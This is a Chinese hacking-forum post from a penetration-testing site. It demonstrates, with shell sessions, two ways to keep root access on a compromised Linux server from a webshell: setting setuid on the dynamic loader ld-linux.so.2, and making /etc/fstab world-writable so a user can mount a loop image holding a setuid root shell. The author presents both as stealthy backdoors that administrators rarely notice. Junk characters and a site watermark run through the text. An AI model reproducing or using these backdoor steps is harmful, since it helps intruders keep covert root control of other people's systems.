中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究% Q4 G; \* w; B. C- F6 r9 l5 }4 ]
$ r3 `! f8 ?, F3 l
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究5 M1 y" x2 W, d" a7 r
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
/ @: o! ]7 I; c3 v, {lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
- X1 j* ?3 c& x. v% D[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究! K7 k7 d4 d# |2 F" x. S/ N
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究8 s3 R1 x' m! V% r6 _- A" G' ]
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
- p6 ^# O  [' C+ Olrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究5 s+ j7 n$ H# s4 e! M: e0 k8 L
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究" k* \  q+ A2 C
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究- S; j% T& c1 C( i. }) F

# S: [# F! e' B$ j* B% x+ P普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究1 }" G9 Y; t) q
9 n5 {8 _8 N" e. w; L4 t* Z) Q8 z
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
' P$ T/ L/ M+ Oxiaoyu2ezX-BUG-关注前沿信息安全技术研究
) ~4 I( d6 v) P[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究5 o0 p0 {$ a( k! Z$ x% Q
root2ezX-BUG-关注前沿信息安全技术研究, F, i3 d4 ^9 w$ b: g
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
: T& X# W1 c+ E" i+ [恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
4 }8 m) N; I3 D  z4 P, n. `0 ]8 C& V& h) j/ U5 r# m4 e
方法二:2ezX-BUG-关注前沿信息安全技术研究
& b) f+ [9 h& @) D# B5 }
. |) P6 L' S! ~# B9 E; ]( o2 A2 N看过程:2ezX-BUG-关注前沿信息安全技术研究
: R4 Q/ H' b. |2 `& @
; g- X9 ~9 q& |- R9 j" r- g- S[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究/ L' T0 S6 i" H
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
  W1 m( w5 h& J1 H4 q7 O2 O; l" ]' o7 a2 \6 z& T
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
5 m' f8 ?8 \$ ]6 k1 `  f. S1 W' b% g
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究' i2 G: v% x9 I8 G1 d& ?% U
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
$ r  B% Q8 Z- N# w" x[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
, l4 z8 h: n# ]3 e9 c/ J* k, N
4 _# o4 ~0 J' `1 o. [/ u/ o然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
' {- R; X" u7 L3 g; z( {6 f8 N: o: H& c
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
; l# o: o* t+ O-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
( S! \2 w) |9 J7 s, _5 `[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究. L# q& a7 o1 J0 p" F: W/ I7 K
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究! |  V/ x2 u% {/ m' d
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究* u1 D% g/ m( m! ]( Z$ V
total 182ezX-BUG-关注前沿信息安全技术研究
- F$ h1 ]3 `/ K) Ldrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究( g/ q3 C. \. @1 p& a( o
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
7 {6 Y7 O: O# E, \! Q$ W* l7 \) N& J[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
2 K/ B/ i' V) H; o8 Rsh-3.2#2ezX-BUG-关注前沿信息安全技术研究
  _4 n* ~  @5 q  _7 R% r/ t' D看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究( x' T  e0 d. x3 t) i! a
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
" b! y2 d) j7 X0 L, ?; l: @  t' E% O' I
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
4 p, j* Q8 @5 w3 P2ezX-BUG-关注前沿信息安全技术研究
$ l1 g2 p2 B. [) ?0 {; x( [( i
: s  Z$ V2 T! O* R
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2